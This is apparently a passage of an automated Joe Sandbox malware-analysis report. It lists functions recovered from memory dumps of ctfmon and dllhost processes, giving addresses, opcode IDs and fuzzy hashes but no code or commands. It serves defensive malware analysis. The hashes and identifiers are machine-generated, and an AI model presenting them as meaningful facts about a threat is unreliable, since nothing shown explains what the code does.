                                                            • Opcode ID: 501ebfb32d53b77bfa73271681b4c68c859437956659b5b69505c554cfa63f55
                                                            • Instruction ID: 29387fc2f05059430858109f537c2553001b034b925b35d5a6d4fcb0298afbf0
                                                            • Opcode Fuzzy Hash: 501ebfb32d53b77bfa73271681b4c68c859437956659b5b69505c554cfa63f55
                                                            • Instruction Fuzzy Hash: CB61A431B1891D5FDBA8EBA884666BCB3E2EF9C710F414179E00ED32D6CE286D428740
                                                            Function 00007FFD9B9E39E9 Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2133ef2ef3f117cbe8fa647777d5e898583021c1c2fd9aa4939f636aebf9197
                                                            • Instruction ID: 70aff4c9393b5e8c521b32af49a2a2662f4537b0b9f6023b4cc69759c7ed6678
                                                            • Opcode Fuzzy Hash: e2133ef2ef3f117cbe8fa647777d5e898583021c1c2fd9aa4939f636aebf9197
                                                            • Instruction Fuzzy Hash: BA811D70E1961D9FDF55EFA8C4A5AAC77B1FF58304F1004B9D00DE7296DA34A981CB40
                                                            Function 00007FFD9B9E0B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47cb714a62fe5b86caea7459d17273582272b5b6e447cb02e03fa532787ef337
                                                            • Instruction ID: e601a8220676cf83dfaddc3af7bcabe51748184f0db32d02135490d739c26393
                                                            • Opcode Fuzzy Hash: 47cb714a62fe5b86caea7459d17273582272b5b6e447cb02e03fa532787ef337
                                                            • Instruction Fuzzy Hash: B8415B20B199491FDB99FB7884A6EB573D2EF98300B0601B6E40EC32E7CD29AD06C301
                                                            Function 00007FFD9B9E0CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d89cfbd8019c450f3ee203dffe0cc8333e39094055f34aff92abd0662d00ec17
                                                            • Instruction ID: d68a6002f846806f2f3ee65359405ea3394fc19234e689488df89b47830791bb
                                                            • Opcode Fuzzy Hash: d89cfbd8019c450f3ee203dffe0cc8333e39094055f34aff92abd0662d00ec17
                                                            • Instruction Fuzzy Hash: 7C312A71B1CB481FE758A76CA8166BA7BD1EF99714F0001BEF44EC31C7CD2869028392
                                                            Function 00007FFD9B9E50A9 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 201a61f58569e11d93e4a6f2cbaa0256640e83c6a6bb8d7275ab4d90ef39af02
                                                            • Instruction ID: 9aea58abd2e2820cf1328339dfde905ca96e40f682908b34743c48f6b00f7e23
                                                            • Opcode Fuzzy Hash: 201a61f58569e11d93e4a6f2cbaa0256640e83c6a6bb8d7275ab4d90ef39af02
                                                            • Instruction Fuzzy Hash: FB313521B1EA4D4FDB45EB6848751B87BF1EF98200B0A01FBE409D7297CE18AD048752
                                                            Function 00007FFD9B9E0A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6bee9983fdf97fcfb15926df7468aa37fd67e98f66d62012f9ee1c1e65c5eb1
                                                            • Instruction ID: 7331475f2e35e9bd983f2248130c8d69e88b385d43d747596854cfc376a3e8d3
                                                            • Opcode Fuzzy Hash: f6bee9983fdf97fcfb15926df7468aa37fd67e98f66d62012f9ee1c1e65c5eb1
                                                            • Instruction Fuzzy Hash: 8031A631A1961D9FEF55EBB4C46A6E9BBF0FF58300F0505B6D409E3192DE38AA44CB50
                                                            Function 00007FFD9B9E2488 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b81b2f95ea95b2ba057bc6e996309f4b98f4962550e66e6be28a266cc76f7da1
                                                            • Instruction ID: afadba0eb8fe55d133773aadb0117f58cbc9a22f62d1e518bb2e1d4d88eb0757
                                                            • Opcode Fuzzy Hash: b81b2f95ea95b2ba057bc6e996309f4b98f4962550e66e6be28a266cc76f7da1
                                                            • Instruction Fuzzy Hash: 4A21F831F1880E5BEB58FBAC98656FD73E1EB98310F1501BBE41DD3285CE29AA414791
                                                            Function 00007FFD9B9E09C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa631b75b84aa6e61cc66af88fb81b4fc8cb74926e3a5d16d980897c0980d98e
                                                            • Instruction ID: 900d053f8fb737ebe2e168608f01d31fa5e8ac3a89afeae80d7fe0c7b33c4f3d
                                                            • Opcode Fuzzy Hash: aa631b75b84aa6e61cc66af88fb81b4fc8cb74926e3a5d16d980897c0980d98e
                                                            • Instruction Fuzzy Hash: 6A11A512B1ED4F2FE7B4ABA9147A6B537C1EF95A10B0741BAD40DC21A7DD08AE058381
                                                            Function 00007FFD9B9E089D Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d563170096535b592c7a694b770b5a14189640f3d7515f23df1da5d96726b91d
                                                            • Instruction ID: 6be61ece9e1790904bb3f0662b328f4ed40682c7dfacb2b945f7eff0d10969a7
                                                            • Opcode Fuzzy Hash: d563170096535b592c7a694b770b5a14189640f3d7515f23df1da5d96726b91d
                                                            • Instruction Fuzzy Hash: 9311593171DB8C1FD786EB6880651A97BE0EFD8250F01057FE04DC31B3ED299A428341
                                                            Function 00007FFD9B9E09E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e79d2e455ca33eae75f01dca18375eab62bf8652ba2b96685813eb4279ecbc28
                                                            • Instruction ID: fa8c8e7a4ffb86a9a27890262199ef22118e3f9d20e5d2e2e5d8c50679e5f1a1
                                                            • Opcode Fuzzy Hash: e79d2e455ca33eae75f01dca18375eab62bf8652ba2b96685813eb4279ecbc28
                                                            • Instruction Fuzzy Hash: BF01FC02F2ED0F1AE2F46B9C146A6F627C5DFD4A50B43017AE40DC219ADC19AE464380
                                                            Function 00007FFD9B9E0E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd1a6d120deafb919ba7414a29d6381c5f475036e135219d4aa0845c6ce58e11
                                                            • Instruction ID: 8a18b2a461f83bfb6e79e08d86f4338337c8e3ad48c20d20df6bab2978f5ccd5
                                                            • Opcode Fuzzy Hash: cd1a6d120deafb919ba7414a29d6381c5f475036e135219d4aa0845c6ce58e11
                                                            • Instruction Fuzzy Hash: 30012B20B0E6C91FD347E378A8A96B47FD1AF87215B0941FAE08CCB0B3CA584946C342
                                                            Function 00007FFD9B9E4064 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae5a6184eaa16db75ec0d1c457dcae73e82321d10cab0093635bc3d66ec8d233
                                                            • Instruction ID: f64871fd6cc1b415c73c6aac1cedc6a509e348daf7bfbe79d0b9920689822f16
                                                            • Opcode Fuzzy Hash: ae5a6184eaa16db75ec0d1c457dcae73e82321d10cab0093635bc3d66ec8d233
                                                            • Instruction Fuzzy Hash: 40F02852F1A80E0FEFA4AAAC14AA3FC77D1EF99212B61007ED10DC32A6DD187E064341
                                                            Function 00007FFD9B9E4F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 451efc8e3651cedea99c7d869705eb8a6856dec91a5f01a3ccc399d86f239375
                                                            • Instruction ID: 5c24c66082669bf52365861fea7a7aaef7e3ed6d836f3665e71c36111a15276b
                                                            • Opcode Fuzzy Hash: 451efc8e3651cedea99c7d869705eb8a6856dec91a5f01a3ccc399d86f239375
                                                            • Instruction Fuzzy Hash: F1014920B1E18A2AE72E23B845303FC27119F81354F0705F9D46DCE2E7CD5D2A928352
                                                            Function 00007FFD9B9E518D Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48856b6d16b49f82d7b8edbb59756a8fc3daa3504152abde32ec2868ca81450c
                                                            • Instruction ID: ca8529a1d5faf6068264fcaaf426868e6e4bfe784ee9bc1ddb2098f50f9b5232
                                                            • Opcode Fuzzy Hash: 48856b6d16b49f82d7b8edbb59756a8fc3daa3504152abde32ec2868ca81450c
                                                            • Instruction Fuzzy Hash: 06F0A435F1940E4BEFA4EA9C98651FD73F1EB98310B1504B9E419E7295CE28EF018B90
                                                            Function 00007FFD9B9E0DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92279c8cf6d92e709cecaa563ee0fb2e86bc31568877d0320b6e9e4a00676ac2
                                                            • Instruction ID: ea07005180645d99716a61e4e546278206cf2cb8a8d3bd5723cfd0cb53fdb54d
                                                            • Opcode Fuzzy Hash: 92279c8cf6d92e709cecaa563ee0fb2e86bc31568877d0320b6e9e4a00676ac2
                                                            • Instruction Fuzzy Hash: A5E02B7290E64C2EEB08AA59FC57CF67F98DA87234B00005FF19DC2163E11275638255
                                                            Function 00007FFD9B9E3C81 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: deb2473bbcaf883856bd9436d9b24a62e6b8b98c36fbb438aac96a193b4a17eb
                                                            • Instruction ID: dd04580128bc95bab894c96127eb3acb822901af1a8dec0017402f9824ced386
                                                            • Opcode Fuzzy Hash: deb2473bbcaf883856bd9436d9b24a62e6b8b98c36fbb438aac96a193b4a17eb
                                                            • Instruction Fuzzy Hash: C3E0D83196D90C6BDB25AA59FC6168477A1FB8D304F010169E45CC3191D7259755C301
                                                            Function 00007FFD9B9E4D65 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1786e8dbc94fe636721f19585b7fd1fbc4bd1a06161d5b151394b7ca1547d299
                                                            • Instruction ID: eaeff07692013d08eb41882f2d95426d26a0117b2030e9c6171ae3a87db0f013
                                                            • Opcode Fuzzy Hash: 1786e8dbc94fe636721f19585b7fd1fbc4bd1a06161d5b151394b7ca1547d299
                                                            • Instruction Fuzzy Hash: DCE06F3281AA0C8BEB48AA989C202E837A0FB4D308F0100AAE00CC3290D3326B84C341
                                                            Function 00007FFD9B9E4EF0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7e099b685cc7e4bfa54b05848bb3e461683fe6a70ff907951c04528293e27fc
                                                            • Instruction ID: de53a361d5b21827ed11899fea091e247d39208947b06b25ba6b5a93bf25fe4e
                                                            • Opcode Fuzzy Hash: f7e099b685cc7e4bfa54b05848bb3e461683fe6a70ff907951c04528293e27fc
                                                            • Instruction Fuzzy Hash: 48D0925185F7C95ECB1252B61C390847F706E0381078E81EBC4C5CA6A3D48D0A898322
                                                            Function 00007FFD9B9E0CC0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e17bc4a299026d1b8b24699ac4ad97f5efdbb9a6d40d499536991a14c8ab1bf9
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: e17bc4a299026d1b8b24699ac4ad97f5efdbb9a6d40d499536991a14c8ab1bf9
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9BA11222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d121d8d59690db6f68d8d9961a37dbd912cbdd4bef4c735305bc4055337dc2b
                                                            • Instruction ID: 61c5408ab981c0851da82181cb4543caa9cf800c20c5d5c8208302b0a65d3b9c
                                                            • Opcode Fuzzy Hash: 2d121d8d59690db6f68d8d9961a37dbd912cbdd4bef4c735305bc4055337dc2b
                                                            • Instruction Fuzzy Hash: 32C17C20B1E68E0FE7A99B7884652B57BD1EF66310F0640BED48EC71E7DD5DA842C341
                                                            Function 00007FFD9BA1276D Relevance: .7, Instructions: 680COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee64dc7f3d13b67d80afc222c49cb9b3f7b1a1b91ad49614f34d10d633e02ae4
                                                            • Instruction ID: 9825439bec0f083d81d6ab00e1213296e3eb7bad1fabafff34609e60b2307afe
                                                            • Opcode Fuzzy Hash: ee64dc7f3d13b67d80afc222c49cb9b3f7b1a1b91ad49614f34d10d633e02ae4
                                                            • Instruction Fuzzy Hash: 52324531B0D78E4FE3B5ABA888216B877D1EF41318F0600B9D44D871E7DE6DAD0A8791
                                                            Function 00007FFD9BA134AF Relevance: .5, Instructions: 490COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c30e557c5a8b7f7664c23ed53842b4ed24061f225bcd2e5e59a9f713593f4339
                                                            • Instruction ID: bab53f505d33b3c070f66b20de5f0a20b10e636ee535356698c7882031148e89
                                                            • Opcode Fuzzy Hash: c30e557c5a8b7f7664c23ed53842b4ed24061f225bcd2e5e59a9f713593f4339
                                                            • Instruction Fuzzy Hash: 20E13622B0991E5EEB54FBBCE8A5AECBBA0FF44321F1002BBD05DC7197CE2568458750
                                                            Function 00007FFD9BA134D3 Relevance: .5, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8da6933a241b1f4ce51ae4aecbc4b43821c9cd55b2747f6880e7b26bebcfa2b
                                                            • Instruction ID: 94c1a949f8c6b7331e82413a0f056c972c57dbe080e297acdca0454cba4f1b0a
                                                            • Opcode Fuzzy Hash: d8da6933a241b1f4ce51ae4aecbc4b43821c9cd55b2747f6880e7b26bebcfa2b
                                                            • Instruction Fuzzy Hash: 45D11522B0991E5EEB54FBBCE865AECB7A0FF85321F0002BBD05DC7197CE2568458751
                                                            Function 00007FFD9BA148F1 Relevance: .5, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ac98872caa939232fe32e54334aa3d8fb2785c92565a952e5b6dd09cf4b6882
                                                            • Instruction ID: d0df2a99357d857f47850a02fd4040aa327e62f9478d672b1500a701c57c4898
                                                            • Opcode Fuzzy Hash: 9ac98872caa939232fe32e54334aa3d8fb2785c92565a952e5b6dd09cf4b6882
                                                            • Instruction Fuzzy Hash: 9FE1C4A1B1EA1E4FEBF8DB9CC4A567937E1EF95300B52543DD04DC32B2DDA869018B81
                                                            Function 00007FFD9BA135D3 Relevance: .4, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28866bde30043f297471416eae792f0d3775dc3010d9cb64f4fba59962df210c
                                                            • Instruction ID: 7754d0b6c3752fb16ca292f5800cca5984af3d172be5e7a53a3657603ca23fe0
                                                            • Opcode Fuzzy Hash: 28866bde30043f297471416eae792f0d3775dc3010d9cb64f4fba59962df210c
                                                            • Instruction Fuzzy Hash: 1BB1E322B0991D4EEB94FFA8EC65AEDBBB0FF84311F0002BBD01DD7296CE2568458751
                                                            Function 00007FFD9BA12640 Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ab34cc4df0023decc6eb5550d329d6b1b1bdcd8e00800d5b7da55a3956d9536
                                                            • Instruction ID: a0a100bd7d7ccae32a30119f9a5bb3a739ce5d62e8649b03fce068a5284c22d7
                                                            • Opcode Fuzzy Hash: 3ab34cc4df0023decc6eb5550d329d6b1b1bdcd8e00800d5b7da55a3956d9536
                                                            • Instruction Fuzzy Hash: 50B11531B0DA4A4FE7A4EB98C8646B67792EF85314F1540B9D01EC72D7CE29EC46C781
                                                            Function 00007FFD9BA10EB5 Relevance: .3, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction ID: 992bf3e57ccbbe5e2b5bb424cebf68a2be5b9009d2135694df4cf3f0c99bb512
                                                            • Opcode Fuzzy Hash: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction Fuzzy Hash: 5E81D931F1994D4FDBE8EB6884666BCB7E2EF98710F4501BAD04ED32D6CE646C428740
                                                            Function 00007FFD9BA139E9 Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21b63cbf6d49c95a0f1bd4d7c6b956a8dff518447e2de3f3861874aa370c60a7
                                                            • Instruction ID: 2cc675e7b1ece3e073b0aaaebf58797a6075f0810ffeae300cff9022b8dadb3b
                                                            • Opcode Fuzzy Hash: 21b63cbf6d49c95a0f1bd4d7c6b956a8dff518447e2de3f3861874aa370c60a7
                                                            • Instruction Fuzzy Hash: 2A811D70E0961D8FDB94EFA8C4A5AAD7BF1FF58305F5000B9D00DE7296DA74A941CB40
                                                            Function 00007FFD9BA10B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3958acaf5a909672313bfc7f3209bdcad1101694f741980ee540de56f079f1ce
                                                            • Instruction ID: bcb264e5cae727f648a3a4723ce392b7ce900fcb298fc1a1cab2e4f82f03cec3
                                                            • Opcode Fuzzy Hash: 3958acaf5a909672313bfc7f3209bdcad1101694f741980ee540de56f079f1ce
                                                            • Instruction Fuzzy Hash: 8241182171D9490FD798FB6884A5EB573E2EFA8300B1641B6E41EC32E7CD29AD428341
                                                            Function 00007FFD9BA10CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction ID: 5c68ca2684b9d93ec880240a22bd02ad55e961465d3e0c69b86ad4ef6df28761
                                                            • Opcode Fuzzy Hash: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction Fuzzy Hash: 1F310B21B0DB490FE769A76C98167B97BD1EF99714F0001BEF44EC31C7CD6868028686
                                                            Function 00007FFD9BA150A9 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a90e1bafa509e50cc18db1b48ac1ac3b18917fc2817089ba8e3bbb0ad8c1185
                                                            • Instruction ID: 79bf4efd9bfb063089671edd95e237db3f6a4890ebe6c96d51181ceac5bef64e
                                                            • Opcode Fuzzy Hash: 8a90e1bafa509e50cc18db1b48ac1ac3b18917fc2817089ba8e3bbb0ad8c1185
